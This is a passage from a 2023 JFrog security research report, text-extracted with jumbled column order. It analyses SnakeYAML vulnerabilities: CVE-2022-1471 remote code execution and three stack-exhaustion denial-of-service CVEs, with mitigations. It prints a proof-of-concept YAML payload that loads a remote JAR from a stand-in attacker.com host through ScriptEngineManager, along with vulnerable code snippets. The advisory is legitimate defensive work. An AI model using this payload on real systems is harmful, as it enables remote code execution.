We recommend vendors to apply the suggested mitigation
(below under “Mitigation Options”) ASAP.

Impact Analysi
In December 2022, CVE-2022-1471 (RCE) was made public, Technical Vulnerability Details

which remained unfixed for an entire month after it was SnakeYAML is a popular Java-based YAML parsing that provides a
discovered high-level API for the serialization and deserialization of YAML
This issue was discovered on May 22, 2017 and published in a documents. A crafted YAML file containing a Java Constructor
paper called “Java Unmarshaller Security” by Moritz Bechler. A was revealed to lead to remote code execution due to
CVE was only reported for this issue five years later, on April deserialization.

11, 2022
CVE-2022-1471 was very widespread since SnakeYAML is the SnakeYaml's Constructor class, inherited from SafeConstructor,
#1 YAML parser for Java (according to Maven) allows any class type to be deserialized. A ConstructorException is
thrown, but only after the malicious payload is deserialized.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 24

Vulnerability Analysis and Findings #7 CVE-2022-1471 - Remote code execution in SnakeYAML

To exploit this issue, an attacker must find remote input The PoC will run an arbitrary JAR file supplied from

that propagates into the Yaml.load() method. Additionally, http://attacker.com.

the attacker must deserialize a Java "gadget" class that's However, the vulnerability will not apply to applications that
available in the application's classpath in order to achieve use the (non-default) SafeConstructor.

code execution via the deserialization. In theory, this is

another exploitation prerequisite. However, there are The JFrog Security Research team gave this vulnerability a
default gadget classes available, such as the built-in Critical severity rating.
javax.script.ScriptEngineManager, w h i c h m a k e s t h e
vulnerability always exploitable without needing any The following reasons lower the issue's severity
additional “gadget” classes in the application’s classpath. An attacker must find remote input that propagates into
the Y aml.load() method.

Th e f ollowi ng r easo n s r aise t h e iss u e ' s se v e r ity

It is highly likely SnakeYAML will be used to parse externally-
supplied Y A M L data
A remote code execution proof of concept (PoC example), There is a PoC demonstrating remote code execution for all to
using the Java built-in class see.

javax.script.ScriptEngineManager shows:

C on t ex t u al An al ys i s

String strYaml = "!!javax.script.ScriptEngineManager [!!

java.net.URLClassLoader "
JFrog's contextual analysis scanner checks whether the Yaml.load
+ "[[!!java.net.URL [\"http://attacker.com\"]]]]";;

function is run with external data, where the file contents can
Yaml yaml = new Yaml(new Constructor(Foo.class));

yaml.load(strYaml); be attacker-controlled. The scanner also checks whether a

SafeConstructor to help mitigate the issue.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 25

Vulnerability Analysis and Findings #7 CVE-2022-1471 - Remote code execution in SnakeYAML

Vulnerable Code Snippet

Yaml yaml = new Yaml(new Constructor(Foo.class));

yaml . load (external_data);

Mitigation Options

Use the (non-default) SafeConstructor class to initialize

the Yaml class.

LoaderOptions options = new LoaderOptions();

Yaml yaml = new Yaml(new SafeConstructor(options));

String strYaml = Files.readString(Path.of("input_file"));

String parsed = yaml.load(strYaml);

Note: this class will only allow deserialization of basic types such as Integers, Strings,
Maps etc.

Vulnerabilit y I n -D ept h D etails

N o in-de p th analysis is available for this issue .

T rend A nal ys is

T he following gra p h dis p lays the number of C V E s a ff ecting

S na k e Y A M L disclosed over each of the last 3 years.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 26

Vulnerability Analysis and Findings #7 CVE-2022-1471 - Remote code execution in SnakeYAML

What to expect in 2023?

SnakeYAML CVEs
On April 26, 2022, initial integration of SnakeYAML was pushed
to OSS-Fuzz.

That same day, 3 out of the 7 CVEs were discovered by the fuzzer 7

(CVE-2022-38749,CVE-2022-38750, CVE-2022-38751). 5

In the following days and weeks, 3 more CVEs were discovered 2

using the fuzzer.

2019 2020 2021 2022

We expect 2023 to contain a smaller amount of bugs (but still

more than zero) since OSS-Fuzz keeps running, but is past its
initial prime time.

In December 2022, the latest 7th vulnerability: CVE-2022-1471 (RCE)

was made public, which remained unfixed even at the end of the
year (a whole month after it was released). This CVE was known
from May 22, 2017 more than 5 years ago and published in a paper
uploaded to GitHub about Java Unmarshaller Security by
Moritz Bechler. It was first reported on April 11, 2022.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 27

 #8 + #9 + #10

Vulnerability Analysis and Findings CVE-2022-41854 / CVE-2022-38751 / CVE-2022-38750

Denial of service in SnakeYAML

The DoS impact on library usage carries a moderate threat

#8 + #9 + #10

CVE-2022-41854 / CVE-2022-38751 / CVE-2022-38750

Note that CVE-2022-41854 can be exploited on non-default
Denial of service in SnakeYAML
configurations even on the “fixed” version.

# Affected Artifacts 25,101

Short Description SnakeYAML Stack Exhaustion Technical Vulnerability Details

SnakeYAML is a popular Java-based YAML parsing that provides a

Impact Denial-of-Service
high-level API for the serialization and deserialization of YAML
NVD Severity Rating Medium (CVSS 6.5) documents.

JFrog Severity Rating High When loading a YAML document, SnakeYAML uses recursion to
parse objects from the document.

Fixed Versions CVE-2022-41854: 1.32 [default config],

No fixed versions yet [non-default config]

CVE-2022-38751: 1.31
Google OSS-Fuzz is a continuous fuzz testing service that helps
CVE-2022-38750: 1.31
identify and fix security vulnerabilities in open-source software by
using automated testing and machine learning to generate and
prioritize test cases.

Impact Analysi
Extremely popular since SnakeYAML is the #1 YAML parser for OSS-Fuzz reported the bug, found by one of its fuzzers. A
Java (according to Maven reproducer and stack trace were attached to the report.

The vulnerability has a High severity rating due to the fact

Its ability to exploit the issue for DoS is trivial and stabl The vulnerability is a stack exhaustion by a crafted YAML file
The vulnerable scenario is very likely (parsing untrusted containing a deeply nested YAML, that may lead to a denial of
YAML data, no additional prerequisites!) service.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 28

 #8 + #9 + #10

V ulnerability Analysis and Findings CVE-2022-41854 / CVE-2022-38751 / CVE-2022-38750

Denial of service in SnakeYAML

Despite the vulnerability being fixed and patched on SnakeYAML

The following reasons raise the issue's severity
v1.32 or later, a non-default configuration
It is highly likely SnakeYAML will be used to parse externally-
(setAllowRecursiveKeys(true);) allows this issue to still be
supplied YAML data
exploitable. However, such a configuration is very rare.
A crashing Proof-of-Concept is available through OSS-fuzz for
SnakeYAML
To exploit this issue, an attacker must find remote input that
E ven on patched versions, a non-default configuration can
propagates into the Yaml.load() method. Note that the issue can
be used to exploit the package, though very unlikely.

be exploited even if the Yaml class is initialized with a

SafeConstructor.
The following reasons lower the issue's severity

An attacker must find remote input that propagates into the

The JFrog Security Research team gave this vulnerability a High
Yaml.load() method and the issue can only be exploited if the
severity rating. Yaml class is initialized with a Safe C onstructor or with a
Constructor that accepts an explicit type only.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 29

 #8 + #9 + #10

Vulnerability Analysis and Findings CVE-2022-41854 / CVE-2022-38751 / CVE-2022-38750

Denial of service in SnakeYAML

Contextual Analysis
Vulnerability In-Depth Details

JFrog's contextual analysis scanner checks whether the Yaml.load No in-depth analysis is available for this issue.

function is run with external data, where the file contents can be
attacker-controlled.The scanner also checks whether a vulnerable Trend Analysis

non-default configuration is used on a patched version.

See the trend analysis for CVE-2022-1471 above, which
refers to the same component (SnakeYAML).

Vulnerable Code Snippet

Yaml yaml = new Yaml ( new SafeConstructor ());

yaml.load (external_data);

M iti g ation O ptions

W rap SnakeYAML ' s load method with e x ception handling :

try {

String p arsed = yaml . load (strYaml);

catch ( StackOverflowError e ) {

System . err . p rintln ( "ERROR: Stack limit reached" );

All rights reserved 2023 © JFrog Ltd www.jfrog.com 30

Authors Biographies

Our dedicated team of security engineers and researchers are committed to advancing software security through discovery, analysis, and
exposure of new vulnerabilities and attack methods.

Stay up-to-date with JFrog Security Research. Follow the latest discoveries and technical updates from the JFrog Security Research team in our
security research blog posts and on Twitter at @JFrogSecurity.

____________________________

Shachar Menashe is senior director of JFrog

Security Research. With over 17 years of
experience in security research, including
low-level R&D, reverse engineering, and Yair Mizrahi is a Senior Vulnerability
vulnerability research, Shachar is Researcher at JFrog Security. Mizrahi has
responsible for leading a team of over a decade of experience and
researchers in discovering and analyzing specializes in vulnerability research and
emerging security vulnerabilities and reverse engineering. He is responsible for
malicious packages. He joined JFrog through discovering and analyzing emerging
the Vdoo acquisition in June 2021, where he security vulnerabilities. In addition, Mizrahi
served as vice president of security. Shachar discovered various zero-days and
holds a B.Sc. in electronics engineering and exploited multiple zero-clicks as an
computer science from Tel-Aviv University. Android vulnerability researcher.

All rights reserved 2023 © JFrog Ltd www.jfrog.com 31